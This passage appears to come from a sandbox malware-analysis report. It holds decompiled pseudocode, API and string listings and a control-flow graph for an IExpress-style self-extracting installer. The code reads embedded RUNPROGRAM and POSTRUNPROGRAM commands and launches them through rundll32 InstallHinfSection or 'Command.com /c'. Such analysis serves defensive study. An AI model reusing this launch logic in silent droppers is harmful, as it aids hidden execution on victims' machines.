                                                											_pop(_t150);
                                                											_pop(_t156);
                                                											_pop(_t128);
                                                											return E00386CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                										}
                                                										_t157 = _v404;
                                                										__eflags = _t149;
                                                										if(_t149 != 0) {
                                                											L37:
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												L57:
                                                												_t151 = _v408;
                                                												_t146 =  &_v352;
                                                												_t130 = _t151; // executed
                                                												_t79 = E00383FEF(_t130,  &_v352); // executed
                                                												__eflags = _t79;
                                                												if(_t79 == 0) {
                                                													L61:
                                                													LocalFree(_t151);
                                                													goto L62;
                                                												}
                                                												L58:
                                                												LocalFree(_t151);
                                                												_t127 = _t127 + 1;
                                                												_v396 = _t127;
                                                												__eflags = _t127 - 2;
                                                												if(_t127 >= 2) {
                                                													_t155 = 1;
                                                													__eflags = 1;
                                                													L69:
                                                													__eflags =  *0x388580;
                                                													if( *0x388580 != 0) {
                                                														E00382267();
                                                													}
                                                													_t77 = _t155;
                                                													goto L63;
                                                												}
                                                												_t153 = _v392;
                                                												_t149 = _v388;
                                                												continue;
                                                											}
                                                											L38:
                                                											__eflags =  *0x388180;
                                                											if( *0x388180 == 0) {
                                                												_t146 = 0x4c7;
                                                												E003844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                												LocalFree(_v424);
                                                												 *0x389124 = 0x8007042b;
                                                												goto L62;
                                                											}
                                                											__eflags = _t157;
                                                											if(_t157 == 0) {
                                                												goto L57;
                                                											}
                                                											__eflags =  *0x389a34 & 0x00000004;
                                                											if(__eflags == 0) {
                                                												goto L57;
                                                											}
                                                											_t129 = E00386495(_t127, _t132, _t157, __eflags);
                                                											__eflags = _t129;
                                                											if(_t129 == 0) {
                                                												_t146 = 0x4c8;
                                                												E003844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                												L65:
                                                												LocalFree(_v408);
                                                												 *0x389124 = E00386285();
                                                												goto L62;
                                                											}
                                                											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                											_v404 = _t146;
                                                											__eflags = _t146;
                                                											if(_t146 == 0) {
                                                												_t146 = 0x4c9;
                                                												__eflags = 0;
                                                												E003844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                												FreeLibrary(_t129);
                                                												goto L65;
                                                											}
                                                											__eflags =  *0x388a30;
                                                											_t151 = _v408;
                                                											_v384 = 0;
                                                											_v368 =  &_v280;
                                                											_t96 =  *0x389a40; // 0x3
                                                											_v364 = _t96;
                                                											_t97 =  *0x388a38 & 0x0000ffff;
                                                											_v380 = 0x389154;
                                                											_v376 = _t151;
                                                											_v372 = 0x3891e4;
                                                											_v360 = _t97;
                                                											if( *0x388a30 != 0) {
                                                												_t97 = _t97 | 0x00010000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t144 =  *0x389a34; // 0x1
                                                											__eflags = _t144 & 0x00000008;
                                                											if((_t144 & 0x00000008) != 0) {
                                                												_t97 = _t97 | 0x00020000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t144 & 0x00000010;
                                                											if((_t144 & 0x00000010) != 0) {
                                                												_t97 = _t97 | 0x00040000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											_t145 =  *0x388d48; // 0x0
                                                											__eflags = _t145 & 0x00000040;
                                                											if((_t145 & 0x00000040) != 0) {
                                                												_t97 = _t97 | 0x00080000;
                                                												__eflags = _t97;
                                                												_v360 = _t97;
                                                											}
                                                											__eflags = _t145;
                                                											if(_t145 < 0) {
                                                												_t104 = _t97 | 0x00100000;
                                                												__eflags = _t104;
                                                												_v360 = _t104;
                                                											}
                                                											_t98 =  *0x389a38; // 0x0
                                                											_v356 = _t98;
                                                											_t130 = _t146;
                                                											 *0x38a288( &_v384);
                                                											_t101 = _v404();
                                                											__eflags = _t164 - _t164;
                                                											if(_t164 != _t164) {
                                                												_t130 = 4;
                                                												asm("int 0x29");
                                                											}
                                                											 *0x389124 = _t101;
                                                											_push(_t129);
                                                											__eflags = _t101;
                                                											if(_t101 < 0) {
                                                												FreeLibrary();
                                                												goto L61;
                                                											} else {
                                                												FreeLibrary();
                                                												_t127 = _v400;
                                                												goto L58;
                                                											}
                                                										}
                                                										__eflags =  *0x389a40 - 1; // 0x3
                                                										if(__eflags == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags =  *0x388a20;
                                                										if( *0x388a20 == 0) {
                                                											goto L37;
                                                										}
                                                										__eflags = _t157;
                                                										if(_t157 != 0) {
                                                											goto L38;
                                                										}
                                                										_v388 = 1;
                                                										E0038202A(_t146); // executed
                                                										goto L37;
                                                									}
                                                									_t146 =  &_v280;
                                                									_t108 = E0038468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                									__eflags = _t108;
                                                									if(_t108 == 0) {
                                                										goto L25;
                                                									}
                                                									__eflags =  *0x388c42;
                                                									if( *0x388c42 != 0) {
                                                										goto L69;
                                                									}
                                                									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                									__eflags = _t112 == 0;
                                                									if(_t112 == 0) {
                                                										goto L69;
                                                									}
                                                									goto L31;
                                                								}
                                                								_t118 =  *0x388a38; // 0x0
                                                								if(_t118 == 0) {
                                                									L23:
                                                									if(_t153 != 0) {
                                                										goto L31;
                                                									}
                                                									_t146 =  &_v276;
                                                									if(E0038468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                										goto L27;
                                                									}
                                                									goto L25;
                                                								}
                                                								if((_t118 & 0x00000001) == 0) {
                                                									__eflags = _t118 & 0x00000002;
                                                									if((_t118 & 0x00000002) == 0) {
                                                										goto L62;
                                                									}
                                                									_t140 = "USRQCMD";
                                                									L20:
                                                									_t146 =  &_v276;
                                                									if(E0038468F(_t140,  &_v276, 0x104) == 0) {
                                                										goto L25;
                                                									}
                                                									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                										_t153 = 1;
                                                										_v388 = 1;
                                                									}
                                                									goto L23;
                                                								}
                                                								_t140 = "ADMQCMD";
                                                								goto L20;
                                                							}
                                                						}
                                                						L26:
                                                						_push(_t130);
                                                						_t146 = 0x104;
                                                						E00381781( &_v276, 0x104, _t130, 0x388c42);
                                                						goto L27;
                                                					}
                                                				}
                                                				_t130 = "REBOOT";
                                                				_t125 = E0038468F(_t130, 0x389a2c, 4);
                                                				if(_t125 == 0 || _t125 > 4) {
                                                					goto L25;
                                                				} else {
                                                					goto L3;
                                                				}
                                                			}





























































                                                0x00383baa
                                                0x00383bb0
                                                0x00383bb7
                                                0x00383bc0
                                                0x00383bc2
                                                0x00383bc9
                                                0x00383bcb
                                                0x00383bcf
                                                0x00383bd3
                                                0x00383bd9
                                                0x00383bfd
                                                0x00383bfd
                                                0x00383bff
                                                0x00383c03
                                                0x00383c03
                                                0x00383c11
                                                0x00383c16
                                                0x00383c19
                                                0x00383c28
                                                0x00000000
                                                0x00000000
                                                0x00383c30
                                                0x00383c39
                                                0x00383c40
                                                0x00383d13
                                                0x00383d15
                                                0x00383d21
                                                0x00383d26
                                                0x00000000
                                                0x00383c4f
                                                0x00383c56
                                                0x00383c60
                                                0x00383c65
                                                0x00383c77
                                                0x00383c78
                                                0x00383c7c
                                                0x00383c7e
                                                0x00383c82
                                                0x00383c82
                                                0x00000000
                                                0x00383c7c
                                                0x00383c67
                                                0x00383c69
                                                0x00383c6d
                                                0x00000000
                                                0x00383c58
                                                0x00383c58
                                                0x00383c6e
                                                0x00383c6e
                                                0x00383c87
                                                0x00383c89
                                                0x00383d4d
                                                0x00383d4f
                                                0x00383d50
                                                0x00383d52
                                                0x00383d9e
                                                0x00383da8
                                                0x00383daf
                                                0x00383db4
                                                0x00383db6
                                                0x00383f4d
                                                0x00383f4d
                                                0x00383f4f
                                                0x00383f56
                                                0x00383f57
                                                0x00383f58
                                                0x00383f63
                                                0x00383f63
                                                0x00383dbc
                                                0x00383dc0
                                                0x00383dc2
                                                0x00383de6
                                                0x00383de6
                                                0x00383de8
                                                0x00383f0b
                                                0x00383f0b
                                                0x00383f0f
                                                0x00383f13
                                                0x00383f15
                                                0x00383f1a
                                                0x00383f1c
                                                0x00383f46
                                                0x00383f47
                                                0x00000000
                                                0x00383f47
                                                0x00383f1e
                                                0x00383f1f
                                                0x00383f25
                                                0x00383f26
                                                0x00383f2a
                                                0x00383f2d
                                                0x00383fd9
                                                0x00383fd9
                                                0x00383fda
                                                0x00383fda
                                                0x00383fe1
                                                0x00383fe3
                                                0x00383fe3
                                                0x00383fe8
                                                0x00000000
                                                0x00383fe8
                                                0x00383f33
                                                0x00383f37
                                                0x00000000
                                                0x00383f37
                                                0x00383dee
                                                0x00383dee
                                                0x00383df5
                                                0x00383fad
                                                0x00383fb9
                                                0x00383fc2
                                                0x00383fc8
                                                0x00000000
                                                0x00383fc8
                                                0x00383dfb
                                                0x00383dfd
                                                0x00000000
                                                0x00000000
                                                0x00383e03
                                                0x00383e0a
                                                0x00000000
                                                0x00000000
                                                0x00383e15
                                                0x00383e17
                                                0x00383e19
                                                0x00383f94
                                                0x00383fa4
                                                0x00383f7c
                                                0x00383f80
                                                0x00383f8b
                                                0x00000000
                                                0x00383f8b
                                                0x00383e2c
                                                0x00383e30
                                                0x00383e34
                                                0x00383e36
                                                0x00383f69
                                                0x00383f6e
                                                0x00383f70
                                                0x00383f76
                                                0x00000000
                                                0x00383f76
                                                0x00383e3c
                                                0x00383e43
                                                0x00383e47
                                                0x00383e52
                                                0x00383e56
                                                0x00383e5c
                                                0x00383e61
                                                0x00383e68
                                                0x00383e70
                                                0x00383e74
                                                0x00383e7c
                                                0x00383e80
                                                0x00383e82
                                                0x00383e82
                                                0x00383e87
                                                0x00383e87
                                                0x00383e8b
                                                0x00383e91
                                                0x00383e94
                                                0x00383e96
                                                0x00383e96
                                                0x00383e9b
                                                0x00383e9b
                                                0x00383e9f
                                                0x00383ea2
                                                0x00383ea4
                                                0x00383ea4
                                                0x00383ea9
                                                0x00383ea9
                                                0x00383ead
                                                0x00383eb3
                                                0x00383eb6
                                                0x00383eb8
                                                0x00383eb8
                                                0x00383ebd
                                                0x00383ebd
                                                0x00383ec1
                                                0x00383ec3
                                                0x00383ec5
                                                0x00383ec5
                                                0x00383eca
                                                0x00383eca
                                                0x00383ece
                                                0x00383ed5
                                                0x00383ed9
                                                0x00383ee0
                                                0x00383ee6
                                                0x00383eea
                                                0x00383eec
                                                0x00383eee
                                                0x00383ef3
                                                0x00383ef3
                                                0x00383ef5
                                                0x00383efa
                                                0x00383efb
                                                0x00383efd
                                                0x00383f40
                                                0x00000000
                                                0x00383eff
                                                0x00383eff
                                                0x00383f05
                                                0x00000000
                                                0x00383f05
                                                0x00383efd
                                                0x00383dc7
                                                0x00383dce
                                                0x00000000
                                                0x00000000
                                                0x00383dd0
                                                0x00383dd7
                                                0x00000000
                                                0x00000000
                                                0x00383dd9
                                                0x00383ddb
                                                0x00000000
                                                0x00000000
                                                0x00383ddd
                                                0x00383de1
                                                0x00000000
                                                0x00383de1
                                                0x00383d59
                                                0x00383d65
                                                0x00383d6a
                                                0x00383d6c
                                                0x00000000
                                                0x00000000
                                                0x00383d6e
                                                0x00383d75
                                                0x00000000
                                                0x00000000
                                                0x00383d8f
                                                0x00383d96
                                                0x00383d98
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00383d98
                                                0x00383c8f
                                                0x00383c98
                                                0x00383cf1
                                                0x00383cf3
                                                0x00000000
                                                0x00000000
                                                0x00383cfe
                                                0x00383d11
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00383d11
                                                0x00383c9c
                                                0x00383ca5
                                                0x00383ca7
                                                0x00000000
                                                0x00000000
                                                0x00383cad
                                                0x00383cb2
                                                0x00383cb7
                                                0x00383cc5
                                                0x00000000
                                                0x00000000
                                                0x00383ce8
                                                0x00383cec
                                                0x00383ced
                                                0x00383ced
                                                0x00000000
                                                0x00383ce8
                                                0x00383c9e
                                                0x00000000
                                                0x00383c9e
                                                0x00383c56
                                                0x00383d35
                                                0x00383d35
                                                0x00383d3c
                                                0x00383d48
                                                0x00000000
                                                0x00383d48
                                                0x00383c03
                                                0x00383be2
                                                0x00383be7
                                                0x00383bee
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • memset.MSVCRT ref: 00383C11
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00383CDC
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                  • Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                  • Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                  • Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                  • Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
                                                  • Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00388C42), ref: 00383D8F
                                                • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00383E26
                                                • FreeLibrary.KERNEL32(00000000,?,00388C42), ref: 00383EFF
                                                • LocalFree.KERNEL32(?,?,?,?,00388C42), ref: 00383F1F
                                                • FreeLibrary.KERNEL32(00000000,?,00388C42), ref: 00383F40
                                                • LocalFree.KERNEL32(?,?,?,?,00388C42), ref: 00383F47
                                                • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00388C42), ref: 00383F76
                                                • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00388C42), ref: 00383F80
                                                • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00388C42), ref: 00383FC2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lega
                                                • API String ID: 1032054927-828702272
                                                • Opcode ID: 731ade7a37b14bef01d1f74533782a51ca49224891fa670778ecf586ef201b31
                                                • Instruction ID: 0d03bf25af504aa95cdbfabb3ee3eaa6549fe52b571d3aa9e97aa24ab2afd701
                                                • Opcode Fuzzy Hash: 731ade7a37b14bef01d1f74533782a51ca49224891fa670778ecf586ef201b31
                                                • Instruction Fuzzy Hash: B7B1E4705083019BD727FF248845B6BB6E8EB84B00F1109EEFA85D62D0EB74DA45CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 141 381ae8-381b2c call 381680 144 381b3b-381b40 141->144 145 381b2e-381b39 141->145 146 381b46-381b61 call 381a84 144->146 145->146 149 381b9f-381bc2 call 381781 call 38658a 146->149 150 381b63-381b65 146->150 157 381bc7-381bd3 call 3866c8 149->157 152 381b68-381b6d 150->152 152->152 154 381b6f-381b74 152->154 154->149 156 381b76-381b7b 154->156 158 381b7d-381b81 156->158 159 381b83-381b86 156->159 166 381bd9-381bf1 CompareStringA 157->166 167 381d73-381d7f call 3866c8 157->167 158->159 161 381b8c-381b9d call 381680 158->161 159->149 162 381b88-381b8a 159->162 161->157 162->149 162->161 166->167 168 381bf7-381c07 GetFileAttributesA 166->168 175 381df8-381e09 LocalAlloc 167->175 176 381d81-381d99 CompareStringA 167->176 170 381c0d-381c15 168->170 171 381d53-381d5e 168->171 170->171 174 381c1b-381c33 call 381a84 170->174 173 381d64-381d6e call 3844b9 171->173 188 381e94-381ea4 call 386ce0 173->188 190 381c50-381c61 LocalAlloc 174->190 191 381c35-381c38 174->191 178 381e0b-381e1b GetFileAttributesA 175->178 179 381dd4-381ddf 175->179 176->175 181 381d9b-381da2 176->181 183 381e1d-381e1f 178->183 184 381e67-381e73 call 381680 178->184 179->173 186 381da5-381daa 181->186 183->184 189 381e21-381e3e call 381781 183->189 195 381e78-381e84 call 382aac 184->195 186->186 192 381dac-381db4 186->192 189->195 211 381e40-381e43 189->211 190->179 194 381c67-381c72 190->194 198 381c3a 191->198 199 381c40-381c4b call 381a84 191->199 193 381db7-381dbc 192->193 193->193 200 381dbe-381dd2 LocalAlloc 193->200 202 381c79-381cc0 GetPrivateProfileIntA GetPrivateProfileStringA 194->202 203 381c74 194->203 210 381e89-381e92 195->210 198->199 199->190 200->179 207 381de1-381df3 call 38171e 200->207 208 381cf8-381d07 202->208 209 381cc2-381ccc 202->209 203->202 207->210 216 381d09-381d21 GetShortPathNameA 208->216 217 381d23 208->217 213 381cce 209->213 214 381cd3-381cf3 call 381680 * 2 209->214 210->188 211->195 215 381e45-381e65 call 3816b3 * 2 211->215 213->214 214->210 215->195 218 381d28-381d2b 216->218 217->218 222 381d2d 218->222 223 381d32-381d4e call 38171e 218->223 222->223 223->210
                                                C-Code - Quality: 82%
                                                			E00381AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v527;
                                                				char _v528;
                                                				char _v1552;
                                                				CHAR* _v1556;
                                                				int* _v1560;
                                                				CHAR** _v1564;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t48;
                                                				CHAR* _t53;
                                                				CHAR* _t54;
                                                				char* _t57;
                                                				char* _t58;
                                                				CHAR* _t60;
                                                				void* _t62;
                                                				signed char _t65;
                                                				intOrPtr _t76;
                                                				intOrPtr _t77;
                                                				unsigned int _t85;
                                                				CHAR* _t90;
                                                				CHAR* _t92;
                                                				char _t105;
                                                				char _t106;
                                                				CHAR** _t111;
                                                				CHAR* _t115;
                                                				intOrPtr* _t125;
                                                				void* _t126;
                                                				CHAR* _t132;
                                                				CHAR* _t135;
                                                				void* _t138;
                                                				void* _t139;
                                                				void* _t145;
                                                				intOrPtr* _t146;
                                                				char* _t148;
                                                				CHAR* _t151;
                                                				void* _t152;
                                                				CHAR* _t155;
                                                				CHAR* _t156;
                                                				void* _t157;
                                                				signed int _t158;
                                                
                                                				_t48 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t48 ^ _t158;
                                                				_t108 = __ecx;
                                                				_v1564 = _a4;
                                                				_v1560 = _a8;
                                                				E00381680( &_v528, 0x104, __ecx);
                                                				if(_v528 != 0x22) {
                                                					_t135 = " ";
                                                					_t53 =  &_v528;
                                                				} else {
                                                					_t135 = "\"";
                                                					_t53 =  &_v527;
                                                				}
                                                				_t111 =  &_v1556;
                                                				_v1556 = _t53;
                                                				_t54 = E00381A84(_t111, _t135);
                                                				_t156 = _v1556;
                                                				_t151 = _t54;
                                                				if(_t156 == 0) {
                                                					L12:
                                                					_push(_t111);
                                                					E00381781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                					E0038658A( &_v268, 0x104, _t156);
                                                					goto L13;
                                                				} else {
                                                					_t132 = _t156;
                                                					_t148 =  &(_t132[1]);
                                                					do {
                                                						_t105 =  *_t132;
                                                						_t132 =  &(_t132[1]);
                                                					} while (_t105 != 0);
                                                					_t111 = _t132 - _t148;
                                                					if(_t111 < 3) {
                                                						goto L12;
                                                					}
                                                					_t106 = _t156[1];
                                                					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                							goto L12;
                                                						} else {
                                                							goto L11;
                                                						}
                                                					} else {
                                                						L11:
                                                						E00381680( &_v268, 0x104, _t156);
                                                						L13:
                                                						_t138 = 0x2e;
                                                						_t57 = E003866C8(_t156, _t138);
                                                						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                							_t139 = 0x2e;
                                                							_t115 = _t156;
                                                							_t58 = E003866C8(_t115, _t139);
                                                							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                								_t156 = LocalAlloc(0x40, 0x400);
                                                								if(_t156 == 0) {
                                                									goto L43;
                                                								}
                                                								_t65 = GetFileAttributesA( &_v268); // executed
                                                								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                									E00381680( &_v1552, 0x400, _t108);
                                                								} else {
                                                									_push(_t115);
                                                									_t108 = 0x400;
                                                									E00381781( &_v1552, 0x400, _t115,  &_v268);
                                                									if(_t151 != 0 &&  *_t151 != 0) {
                                                										E003816B3( &_v1552, 0x400, " ");
                                                										E003816B3( &_v1552, 0x400, _t151);
                                                									}
                                                								}
                                                								_t140 = _t156;
                                                								 *_t156 = 0;
                                                								E00382AAC( &_v1552, _t156, _t156);
                                                								goto L53;
                                                							} else {
                                                								_t108 = "Command.com /c %s";
                                                								_t125 = "Command.com /c %s";
                                                								_t145 = _t125 + 1;
                                                								do {
                                                									_t76 =  *_t125;
                                                									_t125 = _t125 + 1;
                                                								} while (_t76 != 0);
                                                								_t126 = _t125 - _t145;
                                                								_t146 =  &_v268;
                                                								_t157 = _t146 + 1;
                                                								do {
                                                									_t77 =  *_t146;
                                                									_t146 = _t146 + 1;
                                                								} while (_t77 != 0);
                                                								_t140 = _t146 - _t157;
                                                								_t154 = _t126 + 8 + _t146 - _t157;
                                                								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                								if(_t156 != 0) {
                                                									E0038171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                									goto L53;
                                                								}
                                                								goto L43;
                                                							}
                                                						} else {
                                                							_t85 = GetFileAttributesA( &_v268);
                                                							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                								_t140 = 0x525;
                                                								_push(0);
                                                								_push(0x10);
                                                								_push(0);
                                                								_t60 =  &_v268;
                                                								goto L35;
                                                							} else {
                                                								_t140 = "[";
                                                								_v1556 = _t151;
                                                								_t90 = E00381A84( &_v1556, "[");
                                                								if(_t90 != 0) {
                                                									if( *_t90 != 0) {
                                                										_v1556 = _t90;
                                                									}
                                                									_t140 = "]";
                                                									E00381A84( &_v1556, "]");
                                                								}
                                                								_t156 = LocalAlloc(0x40, 0x200);
                                                								if(_t156 == 0) {
                                                									L43:
                                                									_t60 = 0;
                                                									_t140 = 0x4b5;
                                                									_push(0);
                                                									_push(0x10);
                                                									_push(0);
                                                									L35:
                                                									_push(_t60);
                                                									E003844B9(0, _t140);
                                                									_t62 = 0;
                                                									goto L54;
                                                								} else {
                                                									_t155 = _v1556;
                                                									_t92 = _t155;
                                                									if( *_t155 == 0) {
                                                										_t92 = "DefaultInstall";
                                                									}
                                                									 *0x389120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                									 *_v1560 = 1;
                                                									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x381140, _t156, 8,  &_v268) == 0) {
                                                										 *0x389a34 =  *0x389a34 & 0xfffffffb;
                                                										if( *0x389a40 != 0) {
                                                											_t108 = "setupapi.dll";
                                                										} else {
                                                											_t108 = "setupx.dll";
                                                											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                										}
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										_push( &_v268);
                                                										_push(_t155);
                                                										E0038171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                									} else {
                                                										 *0x389a34 =  *0x389a34 | 0x00000004;
                                                										if( *_t155 == 0) {
                                                											_t155 = "DefaultInstall";
                                                										}
                                                										E00381680(_t108, 0x104, _t155);
                                                										_t140 = 0x200;
                                                										E00381680(_t156, 0x200,  &_v268);
                                                									}
                                                									L53:
                                                									_t62 = 1;
                                                									 *_v1564 = _t156;
                                                									L54:
                                                									_pop(_t152);
                                                									return E00386CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}














































                                                0x00381af3
                                                0x00381afa
                                                0x00381b07
                                                0x00381b09
                                                0x00381b1a
                                                0x00381b20
                                                0x00381b2c
                                                0x00381b3b
                                                0x00381b40
                                                0x00381b2e
                                                0x00381b2e
                                                0x00381b33
                                                0x00381b33
                                                0x00381b46
                                                0x00381b4c
                                                0x00381b52
                                                0x00381b57
                                                0x00381b5d
                                                0x00381b61
                                                0x00381b9f
                                                0x00381b9f
                                                0x00381bb1
                                                0x00381bc2
                                                0x00000000
                                                0x00381b63
                                                0x00381b63
                                                0x00381b65
                                                0x00381b68
                                                0x00381b68
                                                0x00381b6a
                                                0x00381b6b
                                                0x00381b6f
                                                0x00381b74
                                                0x00000000
                                                0x00000000
                                                0x00381b76
                                                0x00381b7b
                                                0x00381b86
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00381b8c
                                                0x00381b8c
                                                0x00381b98
                                                0x00381bc7
                                                0x00381bc9
                                                0x00381bcc
                                                0x00381bd3
                                                0x00381d75
                                                0x00381d76
                                                0x00381d78
                                                0x00381d7f
                                                0x00381e05
                                                0x00381e09
                                                0x00000000
                                                0x00000000
                                                0x00381e12
                                                0x00381e1b
                                                0x00381e73
                                                0x00381e21
                                                0x00381e21
                                                0x00381e28
                                                0x00381e37
                                                0x00381e3e
                                                0x00381e52
                                                0x00381e60
                                                0x00381e60
                                                0x00381e3e
                                                0x00381e79
                                                0x00381e7b
                                                0x00381e84
                                                0x00000000
                                                0x00381d9b
                                                0x00381d9b
                                                0x00381da0
                                                0x00381da2
                                                0x00381da5
                                                0x00381da5
                                                0x00381da7
                                                0x00381da8
                                                0x00381dac
                                                0x00381dae
                                                0x00381db4
                                                0x00381db7
                                                0x00381db7
                                                0x00381db9
                                                0x00381dba
                                                0x00381dbe
                                                0x00381dc3
                                                0x00381dce
                                                0x00381dd2
                                                0x00381deb
                                                0x00000000
                                                0x00381df0
                                                0x00000000
                                                0x00381dd2
                                                0x00381bf7
                                                0x00381bfe
                                                0x00381c07
                                                0x00381d55
                                                0x00381d5a
                                                0x00381d5b
                                                0x00381d5d
                                                0x00381d5e
                                                0x00000000
                                                0x00381c1b
                                                0x00381c1b
                                                0x00381c20
                                                0x00381c2c
                                                0x00381c33
                                                0x00381c38
                                                0x00381c3a
                                                0x00381c3a
                                                0x00381c40
                                                0x00381c4b
                                                0x00381c4b
                                                0x00381c5d
                                                0x00381c61
                                                0x00381dd4
                                                0x00381dd4
                                                0x00381dd6
                                                0x00381ddb
                                                0x00381ddc
                                                0x00381dde
                                                0x00381d64
                                                0x00381d64
                                                0x00381d67
                                                0x00381d6c
                                                0x00000000
                                                0x00381c67
                                                0x00381c67
                                                0x00381c6d
                                                0x00381c72
                                                0x00381c74
                                                0x00381c74
                                                0x00381c8e
                                                0x00381c99
                                                0x00381cc0
                                                0x00381cf8
                                                0x00381d07
                                                0x00381d23
                                                0x00381d09
                                                0x00381d14
                                                0x00381d1b
                                                0x00381d1b
                                                0x00381d2b
                                                0x00381d2d
                                                0x00381d2d
                                                0x00381d38
                                                0x00381d39
                                                0x00381d46
                                                0x00381cc2
                                                0x00381cc2
                                                0x00381ccc
                                                0x00381cce
                                                0x00381cce
                                                0x00381cdb
                                                0x00381ce6
                                                0x00381cee
                                                0x00381cee
                                                0x00381e89
                                                0x00381e91
                                                0x00381e92
                                                0x00381e94
                                                0x00381e97
                                                0x00381ea4
                                                0x00381ea4
                                                0x00381c61
                                                0x00381c07
                                                0x00381bd3
                                                0x00381b7b

                                                APIs
                                                • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00381BE7
                                                • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00381BFE
                                                • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00381C57
                                                • GetPrivateProfileIntA.KERNEL32 ref: 00381C88
                                                • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00381140,00000000,00000008,?), ref: 00381CB8
                                                • GetShortPathNameA.KERNEL32 ref: 00381D1B
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
